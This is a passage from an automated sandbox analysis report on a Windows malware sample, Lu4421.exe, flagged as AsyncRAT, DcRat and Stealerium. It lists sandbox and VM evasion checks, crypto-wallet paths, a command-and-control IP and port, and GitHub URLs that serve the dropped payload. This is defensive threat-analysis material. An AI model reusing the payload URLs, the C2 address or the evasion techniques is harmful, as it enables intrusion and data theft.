                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 99875Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 99766Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 99656Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 99546Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 99435Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 99257Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 99142Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 99016Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 98906Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 98797Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeThread delayed: delay time: 98688Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service0
                        Source: Amcache.hve.4.drBinary or memory string: VMware
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
                        Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: svchost.exe, 00000001.00000002.2956529372.000000001D126000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2956620545.000000001D12C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware svga 3d
                        Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service0
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64404000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64421000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B643CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Video
                        Source: Lu4421.exeBinary or memory string: vmicshutdown
                        Source: Lu4421.exeBinary or memory string: vmware
                        Source: svchost.exe, 00000001.00000002.2954256856.000000001BB00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@V
                        Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                        Source: Lu4421.exeBinary or memory string: vmicvss
                        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface0
                        Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor0
                        Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Lu4421.exeBinary or memory string: vmicheartbeat
                        Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service0
                        Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                        Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service0
                        Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Lu4421.exeBinary or memory string: VirtualMachine:
                        Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Lu4421.exe, 00000000.00000002.2047374086.0000015B7C784000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B643CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA 3D
                        Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service0
                        Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service0
                        Source: C:\Users\user\Desktop\Lu4421.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Tries to detect sandboxes and other dynamic analysis tools (window names)
                        Source: C:\Users\user\Desktop\Lu4421.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\Desktop\Lu4421.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\Desktop\Lu4421.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\Desktop\Lu4421.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\Desktop\Lu4421.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\Desktop\Lu4421.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess queried: DebugObjectHandleJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeNetwork Connect: 51.89.44.68 8848Jump to behavior
                        Found direct / indirect Syscall (likely to bypass EDR)
                        Source: C:\Users\user\Desktop\Lu4421.exeNtQueryInformationProcess: Indirect: 0x11E220BJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeNtQuerySystemInformation: Indirect: 0x11D6806Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeNtQuerySystemInformation: Indirect: 0x11A49F0Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeNtQueryInformationProcess: Indirect: 0x11E2062Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"Jump to behavior
                        Source: svchost.exe, 00000001.00000002.2947120168.000000000321B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.000000000320C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.000000000323A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: svchost.exe, 00000001.00000002.2947120168.000000000321B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.000000000320C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.000000000323A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@

                        Language, Device and Operating System Detection

                        barindex
                        Yara detected Telegram Recon
                        Source: Yara matchFile source: Lu4421.exe, type: SAMPLE
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeCode function: 0_2_011AF200 WaitForSingleObject,GetVersion,0_2_011AF200
                        Source: C:\Users\user\Desktop\Lu4421.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, svchost.exe.0.drBinary or memory string: MSASCui.exe
                        Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, svchost.exe.0.drBinary or memory string: procexp.exe
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, Amcache.hve.4.dr, svchost.exe.0.drBinary or memory string: MsMpEng.exe
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected DcRat
                        Source: Yara matchFile source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2947120168.000000000323E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR
                        Yara detected Stealerium
                        Source: Yara matchFile source: Lu4421.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: Lu4421.exeString found in binary or memory: Electrum!Electrum\wallets
                        Source: Lu4421.exeString found in binary or memory: bytecoinJaxxicom.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                        Source: Lu4421.exeString found in binary or memory: Exodus)Exodus\exodus.wallet
                        Source: Lu4421.exeString found in binary or memory: Ethereum#Ethereum\keystore
                        Source: Lu4421.exeString found in binary or memory: Ethereum#Ethereum\keystore
                        Source: Yara matchFile source: Lu4421.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

                        Remote Access Functionality

                        barindex
                        Yara detected DcRat
                        Source: Yara matchFile source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2947120168.000000000323E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR
                        Yara detected Stealerium
                        Source: Yara matchFile source: Lu4421.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                        Windows Management Instrumentation                        		1
                        Scheduled Task/Job                        		112
                        Process Injection                        		11
                        Masquerading                        		OS Credential Dumping1
                        Query Registry                        		Remote Services1
                        Archive Collected Data                        		11
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Command and Scripting Interpreter                        		1
                        DLL Side-Loading                        		1
                        Scheduled Task/Job                        		1
                        Disable or Modify Tools                        		LSASS Memory761
                        Security Software Discovery                        		Remote Desktop Protocol1
                        Data from Local System                        		1
                        Non-Standard Port                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job                        		Logon Script (Windows)1
                        Abuse Elevation Control Mechanism                        		271
                        Virtualization/Sandbox Evasion                        		Security Account Manager2
                        Process Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive1
                        Ingress Tool Transfer                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                        DLL Side-Loading                        		112
                        Process Injection                        		NTDS271
                        Virtualization/Sandbox Evasion                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Abuse Elevation Control Mechanism                        		LSA Secrets1
                        Application Window Discovery                        		SSHKeylogging13
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                        Obfuscated Files or Information                        		Cached Domain Credentials126
                        System Information Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Software Packing                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Timestomp                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        DLL Side-Loading                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577337 Sample: Lu4421.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 23 41.140.13.0.in-addr.arpa 2->23 25 raw.githubusercontent.com 2->25 27 2 other IPs or domains 2->27 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 15 other signatures 2->41 7 Lu4421.exe 14 5 2->7         started        signatures3 process4 dnsIp5 29 github.com 20.233.83.145, 443, 49736 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->29 31 raw.githubusercontent.com 185.199.108.133, 443, 49730, 49731 FASTLYUS Netherlands 7->31 21 C:\Users\user\AppData\Local\...\svchost.exe, PE32 7->21 dropped 43 Detected unpacking (changes PE section rights) 7->43 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->45 47 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->47 49 5 other signatures 7->49 12 svchost.exe 1 2 7->12         started        16 WerFault.exe 19 16 7->16         started        file6 signatures7 process8 dnsIp9 33 51.89.44.68, 49739, 8848 OVHFR France 12->33 51 Antivirus detection for dropped file 12->51 53 System process connects to network (likely due to code injection or exploit) 12->53 55 Multi AV Scanner detection for dropped file 12->55 57 3 other signatures 12->57 19 C:\ProgramData\Microsoft\...\Report.wer, Unicode 16->19 dropped file10 signatures11

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Lu4421.exe68%ReversingLabsWin64.Trojan.Amadey
                        Lu4421.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\svchost.exe100%AviraHEUR/AGEN.1305769
                        C:\Users\user\AppData\Local\Temp\svchost.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\svchost.exe84%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bg.microsoft.map.fastly.net
                        		199.232.214.172
                        		truefalse
                          		high
                          github.com
                          		20.233.83.145
                          		truefalse
                            		high
                            raw.githubusercontent.com
                            		185.199.108.133
                            		truefalse
                              		high
                              41.140.13.0.in-addr.arpa
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txtfalse
                                  		high
                                  https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txtfalse
                                    		high
                                    https://szurubooru.zulipchat.com/api/v1/messagesfalse
                                      		high
                                      https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txtfalse
                                        		high
                                        https://github.com/kgnfth/tumblr/raw/refs/heads/main/svchost.exefalse
                                          		high
                                          https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exefalse
                                            		high
                                            https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txtfalse
                                              		high
                                              https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txtfalse
                                                		high
                                                https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txtfalse
                                                  		high

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://github.comLu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/kgnfth/tumblr/raw/refs/heads/main/svchost.exePLu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://raw.githubusercontent.comLu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/kgnfthLu4421.exefalse
                                                          		high
                                                          https://github.comLu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://raw.githubusercontent.comLu4421.exe, 00000000.00000002.2043697205.0000015B64314000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gLu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://upx.sf.netAmcache.hve.4.drfalse
                                                                  		high
                                                                  https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processesLu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.00000000036B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachiLu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_usernaLu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_naLu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/iLu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/Lu4421.exefalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                185.199.108.133
                                                                                		raw.githubusercontent.comNetherlands
                                                                                		54113FASTLYUSfalse
                                                                                51.89.44.68
                                                                                		unknownFrance
                                                                                		16276OVHFRtrue
                                                                                20.233.83.145
                                                                                		github.comUnited States
                                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1577337
                                                                                Start date and time:2024-12-18 12:06:24 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 6m 6s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:9
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:Lu4421.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@4/9@3/3
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:
                                                                                • Successful, ratio: 70%
                                                                                • Number of executed functions: 78
                                                                                • Number of non-executed functions: 9
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 199.232.214.172, 20.42.65.92, 20.190.181.23, 20.109.210.53, 13.107.246.63
                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
